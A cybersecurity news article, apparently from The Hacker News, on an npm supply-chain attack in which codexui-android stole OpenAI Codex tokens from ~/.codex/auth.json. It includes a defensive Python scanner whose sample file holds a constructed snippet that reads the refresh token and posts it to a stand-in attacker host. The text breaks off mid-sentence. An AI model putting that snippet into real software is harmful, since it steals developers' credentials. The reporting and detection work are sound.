OpenAI Codex Authentication Tokens Stolen in codexui-android npm Supply Chain Attack
https://thehackernews.com/2026/06/openai-codex-authentication-tokens.html
Publish Date: 2026-06-01 05:31:00
Source Domain: thehackernews.com
Cybersecurity researchers have disclosed details of a new malicious supply chain campaign that’s targeting developers using OpenAI Codex through a legitimate-looking remote web UI.
The tool, named codexui-android, is advertised on GitHub and npm as a remote web UI for OpenAI Codex, attracting over 29,000 weekly downloads. The package is still available for download from the repository.
What makes this activity noteworthy is that it’s not a traditional attack that uses a typosquat or throwaway package to trick developers. Rather, the malicious code is embedded into a functional npm package that has undergone active development. The associated GitHub repository remains clean.
“And for the past month, every single invocation has been quietly exfiltrating your Codex authentication tokens to an attacker-controlled server,” Aikido Security researcher Charlie Eriksen said.
The nefarious changes are said to have been introduced about a month after the package was published to the registry, likely in an effort to build user trust and expand its reach. The npm account associated with the package is “friuns” (aka Igor Levochkin).
Present within the package is code that extracts the contents of Codex’s “~/.codex/auth.json” file and exfiltrates them to a remote server (“sentry.anyclaw[.]store”) that masquerades as Sentry, a legitimate application monitoring and error tracking platform. The captured data includes the following details: access_token, refresh_token, id_token, and account ID.
“The refresh_token doesn’t expire,” Eriksen said. “An attacker holding it can silently impersonate you indefinitely. A stolen Codex refresh_token goes beyond access to a chat interface — it’s persistent, silent access to whatever that account can do.”
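As an added illustration of how a defender might triage an installed package for the pattern described above (a read of the Codex credential file combined with an outbound request to a host masquerading as Sentry), here is a small static-heuristic scanner. It is example code written for this article, not code from the package or from Aikido; the sample files and the host name `sentry.attacker.example` are constructed stand-ins (the article's real domain is `sentry.anyclaw[.]store`), and the Sentry allowlist is an assumption to adjust per environment.

```python
"""Heuristic triage of JavaScript files for Codex credential theft indicators."""
import re
from urllib.parse import urlparse

# Indicators taken from the article: the credential file path and the token fields it holds.
CODEX_AUTH_RE = re.compile(r"\.codex[\\/]auth\.json")
TOKEN_FIELDS = ("access_token", "refresh_token", "id_token")
URL_RE = re.compile(r'''https?://[^\s'"`)]+''')


def is_allowed_host(host: str) -> bool:
    """Assumption: only real Sentry ingest hosts are expected egress for a Sentry client."""
    host = host.lower()
    return host == "sentry.io" or host.endswith(".sentry.io")


def triage_source(path: str, source: str) -> dict:
    """Score one file: which indicators fired and which egress hosts are not allowlisted."""
    reads_auth = bool(CODEX_AUTH_RE.search(source))
    fields = [f for f in TOKEN_FIELDS if f in source]
    hosts = {urlparse(u).hostname for u in URL_RE.findall(source)}
    suspect = sorted(h for h in hosts if h and not is_allowed_host(h))
    if reads_auth and suspect:
        severity = "high"      # credential read and unknown egress host in the same file
    elif reads_auth or fields:
        severity = "medium"    # one indicator alone: worth a manual look
    else:
        severity = "none"
    return {"path": path, "reads_codex_auth": reads_auth,
            "token_fields": fields, "suspect_hosts": suspect, "severity": severity}


# Constructed sample files (not the real package's code), embedded so the scan runs offline.
SAMPLES = {
    "node_modules/pkg/lib/telemetry.js": (
        "const Sentry = require('@sentry/node');\n"
        "Sentry.init({ dsn: 'https://abc123@o1.ingest.sentry.io/42' });\n"
    ),
    "node_modules/pkg/lib/postinstall.js": (
        "const fs = require('fs'), os = require('os'), path = require('path');\n"
        "const creds = JSON.parse(fs.readFileSync(path.join(os.homedir(), '.codex/auth.json')));\n"
        "fetch('https://sentry.attacker.example/api/store', { method: 'POST',"
        " body: JSON.stringify({ t: creds.tokens.refresh_token }) });\n"
    ),
}


def triage_all(samples=SAMPLES) -> list:
    return [triage_source(p, s) for p, s in samples.items()]


if __name__ == "__main__":
    for finding in triage_all():
        print(finding["severity"].upper(), finding["path"], finding["suspect_hosts"])
```

A hit is a prompt to inspect the file by hand and, if confirmed, to revoke and re-issue the Codex tokens rather than rely on their expiry, since the article notes the refresh_token does not expire.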
It’s worth mentioning here that every time a user logs in to the Codex app, CLI, or IDE Extension using either ChatGPT or an API key, the login details are cached locally in a plaintext file at ~/.codex/auth.json or in the operating…